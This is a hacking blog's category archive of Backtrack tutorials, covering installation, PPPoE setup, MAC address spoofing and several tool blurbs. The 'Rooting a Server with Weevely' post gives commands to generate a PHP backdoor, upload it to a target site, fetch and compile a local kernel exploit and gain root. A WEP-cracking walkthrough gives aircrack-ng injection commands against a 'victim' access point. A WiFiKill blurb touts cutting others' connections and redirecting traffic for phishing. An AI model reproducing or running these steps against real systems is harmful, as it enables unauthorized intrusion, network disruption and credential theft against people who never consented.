Category Archives: Backtrack

How To Install Backtrack ? Dual-Boot Tutorial ~

~

How To Install Backtrack?
How To Install Backtrack In Hard Disk?
Backtrack Dual-Boot Installation Tutorial?

How To Install Backtrack Dual Boot Tutorial 

hey guys ? today i’ll tell you how to make dual boot installation of Backtrack..
It’s very easy to install Backtrack
You must have 80GB Hard Disk..
Okay Let’s go..

Requirements :-
1- Backtrack ISO bt-gnome32.iso  HERE
2-USB (4Gb USB)
3-Mini Partition Tool Download HERE
4-Universal USB Installer UUI Download HERE

Okay , after after kidsec.comdownloading every thing you can continue :p
first of all open Mini Partition Tool and make 1 partition for Backtrack  30 GB
Format Type = ext4 umm after making partition format it as ext4..

Now You Have Download UUI . Insert Your 4GB of Pendrive..
we are using USB and UUI because it’s very easy , you can even make Bootable DVD.
Do Something Like This –

Than Click On Create ,kidsec.com remember :- It Will take Around ….. 15 Minutes..

Now you have successfully created bootable USB of Backtrack 5r3 :p

Backtrack needs ext4 formatted partition which we have already created ~
Now restart your computer , on start up , look for the Boot Menu button mine is F9
enter in the boot menu and select 
Boot From USB

vOiLa! Backtrack Working , Now Select Default Boot Text Mode something like this or Select 1st Option which is already selected just press enter..
kidsec.com
after it console open type startx  after Backtrack fully loaded the appearance of cursor appearance of task bar appearance of  Backtrack menu , than you can continue =pP 😀

Now click on Install Backtrack Icon .. follow the instructions.. when the Partition selection screen appears select specify Partition Manually 
Tick on specify partition manually.. it will install in 20 or 30 minutes so be patient …

after installation , Backtrack Will Reboot kidsec.com and you have successfully installed Backtrack..
now whenever you power on your computer you’ll have to choose between Backtrack Or Windows 🙂

Username is = root
Password is = toor

Enjoy Backtrack but remember !! you have to configure it for network 😀
Thank You For Reading , Comment If you Need Any HeLp 🙂

How To Make PPPoE Or dial Up Connection in Backtrack

~
How To Make PPPoE Or Dial-Up Connection in Backtrack
How To Setup Dial up in Backtrack ?
How To Connect To Internet Using Dial Up Connection In Backtrack ?

well i dont want to make this tutorial “long” :v so get your hands ready..

1st of all i am making dial up connection in Backtrack 5r3 using Vmware Player

what you have to do is , download backtrack 5r3 or you can use any (i think :S)
download vmware player
now run Backtrack but ! Network Mode => Bridged ~
Network Mode Must Be => Bridged ~

You have to change mac address in Backtrack , use mac address of windows 
CMD => ipconfig =>
 Physical Address is your Mac Address write it down anywhere

for Changing Mac Address In Backtrack Read This Tutorial ~

After changing your Mac address you can “continue” 😀

open terminal than type

pppoeconf

Screen will pop Press/Click on yes 
Than enter your username
Enter your password
yes yes yes yes yes yes and yes , yes !
now you have successfully connected to internet..
open terminal type ping google.com and vOiLa! 

continue 😛 thank you for reading \m/

How to change Mac Address in Backtrack ?

~

How to change Mac Address in Backtrack ?

well changing mac address in Backtrack is pretty easy…

What Is Mac Address ?

media access control address (MAC address) is a unique identifier assigned to network interfaces for communications on the physical network segment. MAC addresses are used as a network address for most IEEE 802 network technologies, including Ethernet. Logically, MAC addresses are used in themedia access control protocol sublayer of the OSI reference model.

MAC addresses are most often assigned by the manufacturer of a network interface controller (NIC) and are stored in its hardware, such as the card’s read-only memory or some other firmware mechanism. If assigned by the manufacturer, a MAC address usually encodes the manufacturer’s registered identification number and may be referred to as the burned-in address (BIA). It may also be known as an Ethernet hardware address (EHA), hardware address or physical address. This can be contrasted to a programmed address, where the host device issues commands to the NIC to use an arbitrary address. An example is a SOHO router, for which the ISP grants access to only one MAC address (used previously to inserting the router) so the router must use that MAC address on its Internet-facing NIC. Therefore the router administrator configures a MAC address to override the burned-in one.
A network node may have multiple NICs and each must have one unique MAC address per NIC.
MAC addresses are formed according to the rules of one of three numbering name spaces managed by the Institute of Electrical and Electronics Engineers(IEEE): MAC-48, EUI-48, and EUI-64. The IEEE claims trademarks on the names EUI-48 and EUI-64, in which EUI is an abbreviation for Extended Unique Identifier.-WikiPedia~

Now Let Me Tell Youh , How To Change Mac Address In Backtrack..
1. Open ConsoLe than type ifconfig eth0 down
2. Now type , macchanger -r eth0 
3. ifconfig eth0 up
1 Command – it will disable eth0 
2 Command – it will generate random Mac Address
3 Command – it will enable the eth0 😀

Change Mac Address To Whatever You Want-
Change Mac Address Of your Choice-
Open Terminal and type – 
1. ifconfig eth0 down
2.type in terminal  macchanger –mac your MAc address with : : : example 11:22:33:44:55 eth0
                             machchanger –mac 11:22:33:44:55 eth0
3. ifconfig eth0 up

Pretty easy han ? you can msg me if you have any problem 🙂

Rooting a Server with Weevely

~
Hi GuYs 
Today we will learn to Root A Server with Weevely 🙂
Weevely is a python script to backconnect to the shell and makes the tiniest backdoor to connect 🙂
You can google it and Its Mostly used by the people which dont have open ports 🙂
So Our Tutorial Starts from here 😉
First of all Open Weevely 🙂
Now type “./main.py -g -o /root/Desktop/backdoor.php -p r00T”
By this command it will make a backdoor.php in Desktop with Password: r00T
===========================================================
Now Next Step is to upload our backdoor to the server by shell and then
type “./main.py -t -u http://www.target.com/uploads/backdoor.php -p r00T” 
and then it will connect to the server 🙂
===========================================================
Now We have to find the version of the kernel its using 🙂
For Finding that type : “uname -a” and then it will show you the kernel version.
for example my kernel version is 2.6.18 2012 so I will find a local root exploit for 
2.6.18 2012 kernel version 🙂
Rooting depends on local root exploits.
===========================================================
We will use “WGET” to download the local root exploit 🙂
First change the dir to “tmp”
now type: “cd /tmp/”
and now download exploit 🙂
and then we have to compile it by this command 
“gcc 2.6.18.c -o KiDSec”
and then  it will be compiled 🙂
Now chmod 777 KiDSec
By typing ” chmod 777 KiDSec”
===========================================================
Now Just Simply run exploit by typing 
./KiDSec
===========================================================
Y0 Server Rooted !!
Now to check if Server is rooted so type “id”
and then it should say 
“uid=(root) gid=(root)”
==========================================================
Thanks For Reading My Tutorial 🙂
./TR4CK3R

Crack WEP Wifi Password

~
Tools Needed:
  • Backtrack with aircrack-ng installed
  • Wi-Fi adapter capable of injecting packets.
.
Note: We are not responsible for any illegal attempts.

I am using Alfa AWUS036H most used CARD & simulates perfect with Backtrack.
Check your wifi compatible lists here.
.
Step 1:
Run Backtrack And plugin your Wifi adpter.
Open New konsole and type : ifconfig wlan0 up
.
.Step 2:
wlan0 is the name of the wireless card that i used, It can also be different.
To Check all wireless cards that are connected to your system, Type: ” iwconfig “.
.
Step 3:
Now Set your WiFi Adapter on Monitor Mode
Monitor mode lets your router to listen almost every packet in air.
To enable monitor mode, Type : airmon-ng start (your interface)
Example :- airmon-ng start wlan0
.
.Step 4:
New interface mon0 has been created.
To check your new interface, Type: “iwconfig mon0” as shown in fig.
.
.Step 5:
Now find a Network protected by WEP key.
To discover surrounding networks, Type : airodump-ng mon0
.
.
BSSID == Mac address of the AP.
CH == Channel broadcasted in which AP.
ESSID == Name broadcasted by the AP
Cipher == Shows encryption type
.
Step 6:
Now check for network, My Victim for this tutorial is ” linksys ”
To Crack it’s Password or we can say WEP Key, you have to capture Victim’s Data into file.
We again use airodump tool to target a specific AP and channel. You must restrict monitoring to single Channel to get data boost-up.
Type: airodump-ng mon0 –bssid -c (channel ) -w (file name to save )
.
.
As my Victim is broadcasted in channel 6, with BSSID “98:fc:11:c9:14:22″
So i Save the captured DATA as “RHAWEP”
Type : airodump-ng mon0 –bssid 98:fc:11:c9:14:22 -c 6 -w RHAWEP
.
Step 7:
To Crack password at-least 20,000 packets must be captured, 2 methods are being used for this purpose.
1st method == Passive attack: Wait for the Victim to connect to AP & then start Capture packets, This is a bit slower method.
2nd method == Active attack: You have to make a fake authentication (connect) with AP by generating and injecting packets, This is fast method and i am also using this method.
Active method can be done by this commands. Type : aireplay-ng – 1 3 -a (bssid of the target ) (interface)
.
.
I am using this command aireplay-ng -1 3 -a 98:fc:11:c9:14:22 mon0
.
Step 8:
After successfully done with fake authentication, Now generate & inject ARP packets.
Open a new konsole and type : aireplay-ng 3 -b (bssid of target) -h ( Mac address of mon0) (interface)
In my Case: aireplay-ng 3 -b 98:fc:11:c9:14:22 -h 00:c0:ca:50:f8:32 mon0
.
..
If this step was successfully done you will see a lot of packets in airodump capture.
.
.Step 9:
Now Keep calm and wait for 20,000 packets. It would be much easier if you wait for 80-90K packets.
After getting enough packets, Click on the mark present on terminal.
.
Step 10:
Open a new konsole & Enter the below command to Crack WEP Key.
Type: aircrack-ng (name of the file )
In my Case i used : aircrack-ng RHAWEP-0.1-cap
Aircrak will crack the WEP key within few minutes.
.
.Note :
Once you get the output, Remove colons and you’ll get WEP Key.

WiFiKill v1.7 – WiFi EjeCtOr

~


If you want to disable any ip address which use same router to connect internet. Now you can used your android application, WifiKill use as can disable internet connection for a device on the same network. This is alternate version of NETCUT for Android. Simply allows you to scan your wifi network for devices, see their vendor and cut network connection for specified devices. This way you can get rid of network hoggers. It gives option to redirect HTTP traffic to specific IP, this feature can be used even to do phishing smartly. Changelog: – fixed the counter bug (I hope for the last time) – added an option to redirect HTTP traffic to specific IP (caution! this may lead to significant CPU load) – now successful kills are tagged by green icon on the left of IP (this is not 100% correct) 

Download this application from LINK 1 or LINK 2 – 

Network Security Toolkit v2.16.0-4104 Released

~


The Network Security Toolkit is bootable ISO live CD/DVD (NST Live) is based on Fedora. The toolkit was designed to provide easy access to best-of-breed Open Source Network Security Applications and should run on most x86/x86_64 platforms. 

he main intent of developing this toolkit was to provide the network security administrator with a comprehensive set of Open SourceNetwork Security Tools. An advanced Web User Interface (WUI) is provided for system administration, navigation, automation and configuration of many network and security applications found within the Network Security Toolkit distribution.

In the virtual world, NST can be used as a network security analysis, validation and monitoring tool on enterprise virtual servers hosting virtual machines. Network Security Toolkit also makes an excellent tool to help one with crash recovery troubleshooting scenarios and diagnostics.

Yaptest – Penetration Framework

~

It is a penetration testing framework that helps automate the boring parts of pentests.Yaptest aims to make it easy for a pentester to automate parts of testing on the fly. This is particularly useful when testing very large networks. Below are some examples of tasks which would be easy to automate using yaptest:
  • Run nikto on anything nmap thinks is an HTTP service
  • Run hydra on every host with TCP port 21 open
  • Attempt upload a file to any TFTP servers found
  • Run onesixtyone on all hosts that are up
  • Try metasploit’s solaris_kcms_readfile exploit against any hosts running kcmsd
Yaptest is the glue between your favourite tools and the knowledge base gathered during your pentest. It handles all the mundane stuff that can easily be automated and leaves you free to get on with owning boxes demonstrating risk using techniques that yaptest doesn’t know about yet.

Server Analyser : Simple Server Malware Scanner

~

Server Analyser  is a service for detecting and analyzing web-based threats. It currently handles shells, obfuscated JavaScript, Executables, Iframes and port scans.

Featured added:
+ Logging scans
+ Just paste the results ( option 1 )
+ Added new Exploit methods to option 1
+ Latest infections ( will be updated automaticly )
+ Added PHP Shell detection exec()/system() etc. ( more will be added soon )
+ The code has been changed into a smaller one
+ Added new BlackHole methods
+ Added different javascript methods
+ Added decoded php syntaxes
+ gzinflate
+ var url
+ base64_decode
+ The Beta has been releases and uploaded
+ code improvements
+ fixed the dos2unix issue